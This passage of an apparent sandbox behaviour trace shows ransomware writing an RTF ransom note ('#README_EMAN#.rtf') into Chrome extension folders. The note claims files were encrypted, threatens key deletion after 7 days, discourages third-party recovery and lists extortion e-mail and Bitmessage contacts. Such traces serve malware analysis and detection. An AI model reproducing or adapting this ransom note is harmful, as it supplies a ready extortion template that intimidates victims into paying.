.\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.669] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.669] CloseHandle (hObject=0x27c) returned 1 [0301.669] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0301.669] GetLastError () returned 0x2 [0301.669] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 